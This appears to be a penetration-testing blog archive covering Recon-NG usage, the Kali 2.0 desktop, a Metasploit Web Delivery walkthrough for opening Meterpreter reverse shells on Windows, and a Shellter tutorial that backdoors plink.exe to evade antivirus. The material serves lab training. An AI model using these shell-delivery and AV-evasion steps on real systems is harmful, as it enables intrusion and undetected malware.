Network Reconnaissance with Recon-NG – Basic Usage

I am working on a major update for my first book, “Basic Security Testing with Kali Linux”. Since it was published, the Recon-NG tool has changed a bit. I figured I would post a series of articles on how to use the newer Recon-NG.

The Recon-NG Framework is a powerful tool that allows you to perform automated information gathering and network reconnaissance. Recon-NG automates a lot of the steps that are taken in the initial process of a penetration test. You can automatically hit numerous websites to gather passive information on your target and even actively probe the target itself for data. It has numerous features that allow you to collect user information for social engineering attacks, and network information for network mapping and much more.

Think of it as Metasploit for information collection. Anyone who is familiar with Metasploit will feel right at home as the interface was made to have the same look and feel. The command use and process flow are very similar. Basically you can use Recon-NG to gather info on your target, and then attack it with Metasploit.

Using Recon-NG

You can start Recon-NG by selecting it from the ‘Applications > Information Gathering’ menu, or from the command line:

  • Open a terminal window by clicking on the “Terminal” icon on the quick start bar
  • Type, “recon-ng”:

Basic Recon-ng 1

Type, “help” to bring up a list of commands:

Basic Recon-ng 2

Now type, “show modules” to display a list of available modules:

Basic Recon-ng 3

Modules are used to actually perform the recon process. As you can see there are several different ones available. Go ahead and read down through the module list. Some are passive; they never touch the target network, while some directly probe and can even attack the system you are interested in. If you are familiar with the older version of Recon-NG you will notice that the module names look slightly different. Kali 2 includes the latest version of Recon-NG, and the module name layout has changed from previous versions.

The basic layout is:

Basic Recon-ng 4

1. Module Type: Recon – This is a reconnaissance module.
2. Conversion Action: Domains-hosts – Converts data from “Domains” to “hostnames”.
3. Vehicle used to perform Action: Google _Site_Web – Google is used to perform the search.

So from this module name we can see that it is a recon module that uses Google’s web site search to convert Domain Names to individual Hosts attached to that domain.
When you have found a module that you would like to try the process is fairly straight forward.

  • Type, “use [Modulename]” to use the module
  • Type, “show info” to view information about the module
  • And then, “show options” to see what variables can be set
  • Set the option variables with “set [variable]”
  • Finally, type “run” to execute the module

Stay tuned for additional Recon-NG articles and my re-vamped Basic Kali book. Also, check out my latest book, “Intermediate Security Testing with Kali Linux 2” which contains almost 500 pages packed full of step-by-step tutorials using the latest penetration testing tools!

Advertisements

Easy Remote Shells with Web Delivery

This is a sneak peak at a section of the “Web Delivery” chapter in my new Ethical Hacking book, “Intermediate Security Testing with Kali Linux 2“. The Metasploit Web Delivery module is one of the easiest ways to quickly get a remote shell from a Linux, Mac or Windows system. In the full chapter I show how to use it against all three platforms. For the preview we will only cover Windows based targets.

As always, never try to access a network or system that you do not have express written permission to do so. Accessing systems that you don’t have permission to is illegal and you could end up in jail.

Web Delivery

In this section we will learn how to  using the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:

Metasploit Web Delivery 1
2. Now enter:

  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444

3. Type, “show targets”:

Metasploit Web Delivery 2

Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:

Metasploit Web Delivery 3
7. Now type, “exploit”:

Metasploit Web Delivery 4

This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:

Metasploit Web Delivery 5
And after a few seconds you should see:

Metasploit Web Delivery 6

A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”

Metasploit Web Delivery 7

We now have a full Meterpreter shell to the target:

Metasploit Web Delivery 8
Type “exit” to quit the active session and “exit” again to exit Metasploit.

I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also. In addition in the Msfvenom chapter you will also see how to make standalone executable shells that don’t require the target to open a command prompt on their system and manually run the code.

For a lot more ethical hacking training and hands on tutorials, check out “Intermediate Security Testing with Kali Linux 2” available on Amazon.com.

Kali Linux 2.0 New Desktop Overview

Kali 2.0 Desktop 1

After ten years of evolution, Offensive Security brings us Kali 2.0! Kali 2.0 is by far the easiest to use of all the Backtrack/ Kali releases. For those used to the original Kali, the new Kali looks very different. But it is a good thing! The menus have been completely re-organized and streamlined and many of the tools are represented by helpful icons. Let’s take a look a few minutes and look at some of the new features of Kali 2.

If you purchased my “Basic Security Testing with Kali Linux” book which was written for the original version of Kali, this overview will help get you acclimated to the new desktop look quickly, all the underlying tools are pretty much the same. My new book, “Intermediate Security Testing with Kali Linux 2” is already written for Kali 2.0.

What’s new in Kali 2?

  • New user interface
  • New Menus and Categories
  • Native Ruby 2.0 for faster Metasploit loading
  • Desktop notifications
  • Built in Screencasting

Kali 2 is much more streamlined and the layout flows very well compared to earlier versions of Kali/ Backtrack. It just feels like everything is at your fingertips and laid out in a very clear and concise manner.

Desktop Overview

The new Desktop looks very good and places everything at your fingertips:

Kali 2.0 Desktop 2

Favorites Bar

The new Kali comes with a customizable “Favorites bar” on the left side of the desktop. This menu lists the most commonly used applications to get you into the action quicker:

Kali 2.0 Desktop 3

Just click on one and the represented tool is automatically started with the required dependencies. For example, clicking on the Metasploit button pre-starts the database software and checks to make sure the default database has been created before launching Metasploit.

Clicking on the “Show Applications” button on the bottom of the favorites bar reveals a lot more applications. The programs are arranged in folders by type:

Kali 2.0 Desktop 4

If you don’t see the app you want, just type in what you are looking for in the search bar.

Applications Menu

A list of common program favorites listed by categories is located under the Applications menu:

Kali 2.0 Desktop 5

The tools are laid out logically by type. For example, just click on the Web Application Analysis menu item to see the most common web app testing tools:

Kali 2.0 Desktop 6

Notice that I didn’t say “all” of the tools for a specific category would be listed. This is because the menu system only shows the top tools and not all of the tools available in Kali. In reality only a fraction of the installed tools in Kali are actually in the menu system. Most of the tools are accessible only from the command line.

Command Line Tools

The majority of tools are installed in the “/usr/share directory”:

Kali 2.0 Desktop 7
These tools (as well as tools listed in the menu) are run simply by typing their name in a terminal. Take a few moments and familiarize yourself with both the menu system and the share directory.

Auto-minimizing windows

Another thing that is new in Kali 2 is that some windows tend to auto-minimize and seem to dis-appear at times. When a window is minimized you will see a white circle to the left of the associated icon on the favorite bar. In the screenshot below, it is showing that I have two terminal windows minimized:

Kali 2.0 Desktop 8

If I click on the terminal icon once the first terminal window will appear, click twice and both minimized terminal windows re-appear:

Kali 2.0 Desktop 9

You can also hit “Alt-Tab” to show minimized windows. Keep the “Alt” key pressed and arrow around to see additional windows.

Workspaces

As in the earlier versions of Kali/ Backtrack you also have workspaces. If you are not familiar with workspaces, they are basically additional desktop screens that you can use. Hitting the “Super Key” (Windows Key) gives you an overview of all windows that you have open. If you have a touch screen monitor you can also grab and pull the workspaces menu open. With workspaces you are able to drag and drop running programs between the workspaces:

Kali 2.0 Desktop 10
Places Menu

The Places menu contains links to different locations in Kali:

Kali 2.0 Desktop 11

Screencasting

Kali 2 also has the capability to do screen casting built in. With this you can record your security testing adventures as they happen!

Kali 2.0 Desktop 12

Apache Webserver

At the time of this writing, the Service Icons to stop, start and restart Apache Web Server seem to have been removed from Kali 2. Not a problem as you can start them from a terminal prompt by using the following commands:

  • To Start – “service apache2 start” or “/etc/init.d/apache2 start”
  • To Stop – “service apache2 stop” or “/etc/init.d/apache2 stop”
  • To Restart – “service apache2 restart” or “/etc/init.d/apache2 restart”

As seen below:

Kali 2.0 Desktop 13

You can now surf to Kali’s webserver, notice the default webpage has changed from Kali 1:

Kali 2.0 Desktop 14

The root website is also one level deeper now located in a folder called HTTP:

Kali 2.0 Desktop 15
So when you use the Apache server, just drop your website pages/folders into the “/var/www/html/” directory instead of the old “/var/www/” directory.

Upgrading

Keeping your Kali install up to date is very important. Enter the following commands to update Kali:

  • apt-get update
  • apt-get dist-upgrade
  • reboot

Hopefully this overview will help get you up and running on Kali 2.0 quickly.

If you want to learn the basics of Ethical Hacking using the powerful Kali Platform using step-by-step hands on tutorials, check out Check out my Kali book series available on Amazon.com:

Basic Security Testing with Kali Linux

Kali 2.0 Book Cover

 

Anti-Virus Bypass with Shellter 4.0 on Kali Linux

Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 4.0 shell obfuscation program!

The latest version of Shellter for pentesters was revealed at B-Sides Lisbon earlier this month. Updates include increased obfuscation through a custom encoder and polymorphic decoder. Also this version saves a few steps by including the most common Meterpreter shells.

Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program’s automatic mode makes the whole process very pain free. In this tutorial I used the latest version of Kali Linux and a Windows 7 Virtual Machine.

So enough talk, let’s see it in action!

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )

**Note: the Kali repos apparently don’t contain the newest 4.0 version yet. To get the latest, instead of using ‘apt-get install shellter’, just download and extract the ZIP file to the “/etc/share” folder.

2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.

3. Start Shellter – ‘shellter’ from the terminal or use ‘wineconsole shelter’ from ‘/etc/share/shellter’ if you manually installed.

av bypass shellter 111

4. Choose ‘A’ for Automatic Mode

5. At the PE Target Prompt, enter “plink.exe”

6. When prompted for Payloads select “L” and then “1”

av bypass shellter 21

7. Next, enter the IP address of your Kali system (mine is 192.168.1.39)

8. And the port to use (I used 5555)

av bypass shellter 311

Shellter will obfuscate the code and crunch for a while. Then you should see:

Shellter Kali AV 411

Success!

9. Now we need to start a listener service on the Kali system using the same settings from above:

• start Metasploit (‘msfconsole’ in a terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit

10. Now that Kali is waiting for a connection. Copy our evil plink.exe command to the Windows 7 system and run it:

Shellter Kali AV 5

And we have a shell!

Shellter Kali AV 6

Compare the size of the backdoored exe to the original one. They are the exact same size! Now upload the backdoored exe to Virustotal and scan it for malicious content:

Shellter Kali AV 7

One (!) anti-virus engine detected it as malicious. And it was not a mainstream AV normally found in companies…

Conclusion

As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can’t stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don’t allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don’t know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!

(Post Updated 7/13/15 – Changed command from “wine shellter” to “wineconsole shellter” and updated pictures accordingly.)